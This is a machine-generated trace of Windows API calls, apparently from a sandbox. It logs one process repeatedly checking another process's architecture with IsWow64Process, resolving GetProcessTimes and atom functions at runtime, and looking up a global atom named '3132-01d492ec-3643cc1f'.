	[0137.487] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.488] CloseHandle (hObject=0x2dc) returned 1
	[0137.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.488] CloseHandle (hObject=0x2dc) returned 1
	[0137.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.488] CloseHandle (hObject=0x2dc) returned 1
	[0137.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.488] CloseHandle (hObject=0x2dc) returned 1
	[0137.488] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.488] CloseHandle (hObject=0x2dc) returned 1
	[0137.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.521] CloseHandle (hObject=0x2dc) returned 1
	[0137.521] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.521] CloseHandle (hObject=0x2dc) returned 1
	[0137.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.522] CloseHandle (hObject=0x2dc) returned 1
	[0137.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.522] CloseHandle (hObject=0x2dc) returned 1
	[0137.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.522] CloseHandle (hObject=0x2dc) returned 1
	[0137.522] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.522] CloseHandle (hObject=0x2dc) returned 1
	[0137.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.523] CloseHandle (hObject=0x2dc) returned 1
	[0137.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.523] CloseHandle (hObject=0x2dc) returned 1
	[0137.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.523] CloseHandle (hObject=0x2dc) returned 1
	[0137.523] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.523] CloseHandle (hObject=0x2dc) returned 1
	[0137.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.524] CloseHandle (hObject=0x2dc) returned 1
	[0137.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.524] CloseHandle (hObject=0x2dc) returned 1
	[0137.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.524] CloseHandle (hObject=0x2dc) returned 1
	[0137.524] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.524] CloseHandle (hObject=0x2dc) returned 1
	[0137.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.525] CloseHandle (hObject=0x2dc) returned 1
	[0137.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.525] CloseHandle (hObject=0x2dc) returned 1
	[0137.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.525] CloseHandle (hObject=0x2dc) returned 1
	[0137.525] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.525] CloseHandle (hObject=0x2dc) returned 1
	[0137.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.526] CloseHandle (hObject=0x2dc) returned 1
	[0137.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.526] CloseHandle (hObject=0x2dc) returned 1
	[0137.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.526] CloseHandle (hObject=0x2dc) returned 1
	[0137.526] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.526] CloseHandle (hObject=0x2dc) returned 1
	[0137.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.527] CloseHandle (hObject=0x2dc) returned 1
	[0137.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.527] CloseHandle (hObject=0x2dc) returned 1
	[0137.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.527] CloseHandle (hObject=0x2dc) returned 1
	[0137.527] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.527] CloseHandle (hObject=0x2dc) returned 1
	[0137.528] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.528] CloseHandle (hObject=0x2dc) returned 1
	[0137.528] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.528] CloseHandle (hObject=0x2dc) returned 1
	[0137.528] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.528] CloseHandle (hObject=0x2dc) returned 1
	[0137.529] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.529] CloseHandle (hObject=0x2dc) returned 1
	[0137.529] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.529] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.529] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.530] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.530] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.530] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.530] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.530] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.531] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.531] CloseHandle (hObject=0x2dc) returned 1
	[0137.531] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.531] CloseHandle (hObject=0x2dc) returned 1
	[0137.531] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.531] CloseHandle (hObject=0x2dc) returned 1
	[0137.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.532] CloseHandle (hObject=0x2dc) returned 1
	[0137.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.532] CloseHandle (hObject=0x2dc) returned 1
	[0137.532] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.532] CloseHandle (hObject=0x2dc) returned 1
	[0137.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.565] CloseHandle (hObject=0x2dc) returned 1
	[0137.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.565] CloseHandle (hObject=0x2dc) returned 1
	[0137.565] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.565] CloseHandle (hObject=0x2dc) returned 1
	[0137.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.566] CloseHandle (hObject=0x2dc) returned 1
	[0137.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.566] CloseHandle (hObject=0x2dc) returned 1
	[0137.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.566] CloseHandle (hObject=0x2dc) returned 1
	[0137.566] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.566] CloseHandle (hObject=0x2dc) returned 1
	[0137.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.567] CloseHandle (hObject=0x2dc) returned 1
	[0137.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.567] CloseHandle (hObject=0x2dc) returned 1
	[0137.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.567] CloseHandle (hObject=0x2dc) returned 1
	[0137.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.567] CloseHandle (hObject=0x2dc) returned 1
	[0137.567] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.568] CloseHandle (hObject=0x2dc) returned 1
	[0137.568] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.568] CloseHandle (hObject=0x2dc) returned 1
	[0137.568] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.568] CloseHandle (hObject=0x2dc) returned 1
	[0137.568] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.568] CloseHandle (hObject=0x2dc) returned 1
	[0137.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.569] CloseHandle (hObject=0x2dc) returned 1
	[0137.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.569] CloseHandle (hObject=0x2dc) returned 1
	[0137.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.569] CloseHandle (hObject=0x2dc) returned 1
	[0137.569] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.569] CloseHandle (hObject=0x2dc) returned 1
	[0137.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.570] CloseHandle (hObject=0x2dc) returned 1
	[0137.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.570] CloseHandle (hObject=0x2dc) returned 1
	[0137.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.570] CloseHandle (hObject=0x2dc) returned 1
	[0137.570] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.570] CloseHandle (hObject=0x2dc) returned 1
	[0137.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.571] CloseHandle (hObject=0x2dc) returned 1
	[0137.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.571] CloseHandle (hObject=0x2dc) returned 1
	[0137.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.571] CloseHandle (hObject=0x2dc) returned 1
	[0137.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.571] CloseHandle (hObject=0x2dc) returned 1
	[0137.571] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.571] CloseHandle (hObject=0x2dc) returned 1
	[0137.572] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.572] CloseHandle (hObject=0x2dc) returned 1
	[0137.572] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.572] CloseHandle (hObject=0x2dc) returned 1
	[0137.572] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.573] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.573] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.573] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.573] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.573] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.573] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.573] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.574] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.574] CloseHandle (hObject=0x2dc) returned 1
	[0137.574] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.574] CloseHandle (hObject=0x2dc) returned 1
	[0137.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.574] CloseHandle (hObject=0x2dc) returned 1
	[0137.574] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.574] CloseHandle (hObject=0x2dc) returned 1
	[0137.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.575] CloseHandle (hObject=0x2dc) returned 1
	[0137.575] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.575] CloseHandle (hObject=0x2dc) returned 1
	[0137.608] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.608] CloseHandle (hObject=0x2dc) returned 1
	[0137.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.609] CloseHandle (hObject=0x2dc) returned 1
	[0137.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.609] CloseHandle (hObject=0x2dc) returned 1
	[0137.609] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.609] CloseHandle (hObject=0x2dc) returned 1
	[0137.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.610] CloseHandle (hObject=0x2dc) returned 1
	[0137.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.610] CloseHandle (hObject=0x2dc) returned 1
	[0137.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.610] CloseHandle (hObject=0x2dc) returned 1
	[0137.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.610] CloseHandle (hObject=0x2dc) returned 1
	[0137.610] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.610] CloseHandle (hObject=0x2dc) returned 1
	[0137.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.611] CloseHandle (hObject=0x2dc) returned 1
	[0137.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.611] CloseHandle (hObject=0x2dc) returned 1
	[0137.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.611] CloseHandle (hObject=0x2dc) returned 1
	[0137.611] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.611] CloseHandle (hObject=0x2dc) returned 1
	[0137.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.612] CloseHandle (hObject=0x2dc) returned 1
	[0137.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.612] CloseHandle (hObject=0x2dc) returned 1
	[0137.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.612] CloseHandle (hObject=0x2dc) returned 1
	[0137.612] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.612] CloseHandle (hObject=0x2dc) returned 1
	[0137.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.613] CloseHandle (hObject=0x2dc) returned 1
	[0137.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.613] CloseHandle (hObject=0x2dc) returned 1
	[0137.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.613] CloseHandle (hObject=0x2dc) returned 1
	[0137.613] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.614] CloseHandle (hObject=0x2dc) returned 1
	[0137.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.614] CloseHandle (hObject=0x2dc) returned 1
	[0137.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.614] CloseHandle (hObject=0x2dc) returned 1
	[0137.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.614] CloseHandle (hObject=0x2dc) returned 1
	[0137.614] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.614] CloseHandle (hObject=0x2dc) returned 1
	[0137.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.615] CloseHandle (hObject=0x2dc) returned 1
	[0137.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.615] CloseHandle (hObject=0x2dc) returned 1
	[0137.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.615] CloseHandle (hObject=0x2dc) returned 1
	[0137.615] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.615] CloseHandle (hObject=0x2dc) returned 1
	[0137.616] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.616] CloseHandle (hObject=0x2dc) returned 1
	[0137.616] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.616] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
	[0137.616] GetProcessTimes (in: hProcess=0x2dc, lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4 | out: lpCreationTime=0x286fadc, lpExitTime=0x286fac4, lpKernelTime=0x286facc, lpUserTime=0x286fad4) returned 1
	[0137.617] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.617] GetProcAddress (hModule=0x765a0000, lpProcName="GlobalFindAtomA") returned 0x765bd0c0
	[0137.617] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.617] GetProcAddress (hModule=0x765a0000, lpProcName="FindAtomA") returned 0x765bef10
	[0137.617] FindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0x0
	[0137.617] GlobalFindAtomA (lpString="3132-01d492ec-3643cc1f") returned 0xc18f
	[0137.617] CloseHandle (hObject=0x2dc) returned 1
	[0137.618] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0xcf4) returned 0x0
	[0137.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.618] CloseHandle (hObject=0x2dc) returned 1
	[0137.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.618] CloseHandle (hObject=0x2dc) returned 1
	[0137.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.618] CloseHandle (hObject=0x2dc) returned 1
	[0137.618] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.618] CloseHandle (hObject=0x2dc) returned 1
	[0137.619] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.619] CloseHandle (hObject=0x2dc) returned 1
	[0137.652] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.652] CloseHandle (hObject=0x2dc) returned 1
	[0137.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.653] CloseHandle (hObject=0x2dc) returned 1
	[0137.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.653] CloseHandle (hObject=0x2dc) returned 1
	[0137.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.653] CloseHandle (hObject=0x2dc) returned 1
	[0137.653] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.653] CloseHandle (hObject=0x2dc) returned 1
	[0137.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.654] CloseHandle (hObject=0x2dc) returned 1
	[0137.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.654] CloseHandle (hObject=0x2dc) returned 1
	[0137.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.654] CloseHandle (hObject=0x2dc) returned 1
	[0137.654] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.654] CloseHandle (hObject=0x2dc) returned 1
	[0137.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.655] CloseHandle (hObject=0x2dc) returned 1
	[0137.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.655] CloseHandle (hObject=0x2dc) returned 1
	[0137.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.655] CloseHandle (hObject=0x2dc) returned 1
	[0137.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.655] CloseHandle (hObject=0x2dc) returned 1
	[0137.655] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.656] CloseHandle (hObject=0x2dc) returned 1
	[0137.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.656] CloseHandle (hObject=0x2dc) returned 1
	[0137.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.656] CloseHandle (hObject=0x2dc) returned 1
	[0137.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.656] CloseHandle (hObject=0x2dc) returned 1
	[0137.656] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.656] CloseHandle (hObject=0x2dc) returned 1
	[0137.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.657] CloseHandle (hObject=0x2dc) returned 1
	[0137.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.657] CloseHandle (hObject=0x2dc) returned 1
	[0137.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.657] CloseHandle (hObject=0x2dc) returned 1
	[0137.657] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.657] CloseHandle (hObject=0x2dc) returned 1
	[0137.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.658] CloseHandle (hObject=0x2dc) returned 1
	[0137.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.658] CloseHandle (hObject=0x2dc) returned 1
	[0137.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.658] CloseHandle (hObject=0x2dc) returned 1
	[0137.658] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.658] CloseHandle (hObject=0x2dc) returned 1
	[0137.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.659] CloseHandle (hObject=0x2dc) returned 1
	[0137.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.659] CloseHandle (hObject=0x2dc) returned 1
	[0137.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.659] CloseHandle (hObject=0x2dc) returned 1
	[0137.659] IsWow64Process (in: hProcess=0x2dc, Wow64Process=0x286fe94 | out: Wow64Process=0x286fe94) returned 1
	[0137.659] CloseHandle (hObject=0x2dc) returned 1
	[0137.660] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x765a0000
	[0137.660] GetProcAddress (hModule=0x765a0000, lpProcName="GetProcessTimes") returned 0x765c3dc0
